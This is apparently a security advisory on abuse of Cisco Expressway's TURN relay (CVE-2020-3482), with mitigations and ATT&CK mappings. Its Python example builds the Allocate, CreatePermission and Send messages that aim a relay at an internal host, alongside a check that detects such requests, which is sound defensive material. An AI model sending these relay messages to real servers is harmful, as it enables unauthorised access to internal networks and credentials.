A security researcher has demonstrated several vulnerabilities in Cisco’s Expressway gateway devices. The STUN protocol (and its extension TURN) is normally used by video conferencing software to find a working path between endpoints that sit behind NAT; where no direct path exists, a TURN server relays the traffic on the endpoints’ behalf. When a TURN relay forwards traffic to any peer address a client names, an outsider can use it to bypass firewall restrictions and reach internal resources.
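To make the relay abuse concrete, the following is an added example written for this page (it is not the researcher’s STUNNER tool and not Cisco code). It builds the three TURN messages a client sends to turn a relay into a proxy, Allocate, CreatePermission and Send (RFC 5766), parses them back, and applies a hypothetical policy check, targets_internal, that flags any message asking the relay to reach an address in the INTERNAL_NETS list, which is an assumed set of protected ranges and not a Cisco setting. It handles IPv4 peers only and never opens a socket; the message bytes are constructed in memory.

```python
import ipaddress
import os
import struct

# Constants from RFC 5389 (STUN) and RFC 5766 (TURN).
MAGIC_COOKIE = 0x2112A442
ALLOCATE_REQUEST = 0x0003
CREATE_PERMISSION_REQUEST = 0x0008
SEND_INDICATION = 0x0016
ATTR_LIFETIME = 0x000D
ATTR_XOR_PEER_ADDRESS = 0x0012
ATTR_DATA = 0x0013
ATTR_REQUESTED_TRANSPORT = 0x0019
IPV4_FAMILY = 0x01

# Hypothetical policy (assumption for this example): ranges a relay must never reach for a client.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def _attr(attr_type, value):
    """TLV-encode one STUN attribute, padded to a 4-byte boundary."""
    pad = (-len(value)) % 4
    return struct.pack("!HH", attr_type, len(value)) + value + b"\x00" * pad


def _xor_address(ip, port):
    """Encode an IPv4 XOR-PEER-ADDRESS value using the RFC 5389 s.15.2 XOR rules."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    x_port = port ^ (MAGIC_COOKIE >> 16)
    x_addr = int(addr) ^ MAGIC_COOKIE
    return struct.pack("!BBHI", 0, IPV4_FAMILY, x_port, x_addr)


def build_message(msg_type, attrs, txid=None):
    """Assemble a STUN/TURN message: 20-byte header followed by attributes."""
    txid = txid or os.urandom(12)
    body = b"".join(attrs)
    return struct.pack("!HHI", msg_type, len(body), MAGIC_COOKIE) + txid + body


def build_allocate():
    """Step 1: ask the TURN server for a relayed UDP transport address."""
    requested_udp = struct.pack("!BBH", 17, 0, 0)  # protocol 17 = UDP, then 3 reserved bytes
    return build_message(ALLOCATE_REQUEST, [_attr(ATTR_REQUESTED_TRANSPORT, requested_udp),
                                           _attr(ATTR_LIFETIME, struct.pack("!I", 600))])


def build_create_permission(peer_ip):
    """Step 2: authorise the relay to exchange traffic with peer_ip (the port is ignored here)."""
    return build_message(CREATE_PERMISSION_REQUEST,
                         [_attr(ATTR_XOR_PEER_ADDRESS, _xor_address(peer_ip, 0))])


def build_send(peer_ip, peer_port, payload):
    """Step 3: ask the relay to forward payload to peer_ip:peer_port, e.g. an internal web interface."""
    return build_message(SEND_INDICATION,
                         [_attr(ATTR_XOR_PEER_ADDRESS, _xor_address(peer_ip, peer_port)),
                          _attr(ATTR_DATA, payload)])


def parse_message(data):
    """Split a STUN/TURN message into (type, transaction id, [(attr_type, value), ...])."""
    if len(data) < 20:
        raise ValueError("short STUN header")
    msg_type, length, cookie = struct.unpack("!HHI", data[:8])
    if cookie != MAGIC_COOKIE or len(data) < 20 + length:
        raise ValueError("not a well-formed STUN message")
    attrs, off = [], 20
    while off < 20 + length:
        attr_type, attr_len = struct.unpack("!HH", data[off:off + 4])
        attrs.append((attr_type, data[off + 4:off + 4 + attr_len]))
        off += 4 + attr_len + ((-attr_len) % 4)
    return msg_type, data[8:20], attrs


def peer_addresses(data):
    """Decode every IPv4 XOR-PEER-ADDRESS in a message as (ip, port)."""
    _, _, attrs = parse_message(data)
    peers = []
    for attr_type, value in attrs:
        if attr_type == ATTR_XOR_PEER_ADDRESS and len(value) == 8 and value[1] == IPV4_FAMILY:
            x_port, x_addr = struct.unpack("!HI", value[2:8])
            peers.append((str(ipaddress.ip_address(x_addr ^ MAGIC_COOKIE)),
                          x_port ^ (MAGIC_COOKIE >> 16)))
    return peers


def targets_internal(data, internal_nets=INTERNAL_NETS):
    """True if a CreatePermission/Send message asks the relay to reach a protected range."""
    return any(any(ipaddress.ip_address(ip) in net for net in internal_nets)
               for ip, _ in peer_addresses(data))


if __name__ == "__main__":
    # Constructed sample: the sequence an outsider sends to point the relay at an internal host.
    for msg in (build_allocate(), build_create_permission("10.0.0.5"),
                build_send("10.0.0.5", 443, b"GET / HTTP/1.0\r\n\r\n")):
        print(hex(parse_message(msg)[0]), peer_addresses(msg), targets_internal(msg))
```

The point of the check is that nothing in the Allocate step reveals the attacker’s intent; the destination only appears in the XOR-PEER-ADDRESS of the later CreatePermission and Send messages, so any relay-side or network-side control has to inspect (or restrict) the peer address, not merely who is allowed to allocate.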
Cisco has published an advisory for CVE-2020-3482: with TURN enabled, an outsider can relay traffic through the Expressway to internal admin interfaces. There is no patch. Cisco’s position is that its own admin interface is password protected, and that changing the relay behaviour would be difficult given the product’s architecture. Expressway owners should be aware that enabling TURN services can give malicious outsiders access to internal resources.
Accessing the interface requires valid credentials, but the researcher also showed how these could be obtained by anyone holding a meeting invitation or a valid telephone number (often published on a company website). Once connected to the internal interface, a logged-in user can download a configuration backup containing password hashes. Cisco is reported to be working on a fix to prevent read-only users from accessing such sensitive data.
The researcher also found a memory leak bug, but Cisco says the leaked information originates with the attacker, so there are no security implications.
A remote attacker could proxy traffic through the Expressway’s TURN relay to reach resources on the internal network.
An attacker with valid meeting details could download sensitive data, including password hashes, from the internal web interface.
The researcher has released a tool called STUNNER on GitHub to test networks for these vulnerabilities.
Cisco Expressway devices with STUN/TURN services enabled and reachable from the internet.
Containment, Mitigations & Remediations
Disabling TURN services would prevent these attacks but may also break video conferencing for participants who depend on the relay.
Web-based admin panels should use strong passwords, even when they are not known to be externally facing.
Cisco Expressway devices should be segregated on the network to prevent them relaying access to other internal devices.
Given that Cisco doesn’t appear to be addressing this issue properly, it may be worth considering other video conferencing solutions.
Indicators of Compromise
The Shodan search engine shows more than 20,000 internet-facing Expressway servers that may be vulnerable.
By their nature, STUN/TURN servers are designed to get around firewalls and architectural constraints that prevent direct connections. This attack illustrates the complexities that can arise from adding new services to a network.
T1210 – Exploitation of Remote Services
T1528 – Steal Application Access Token
T1212 – Exploitation for Credential Access
T1110.002 – Password Cracking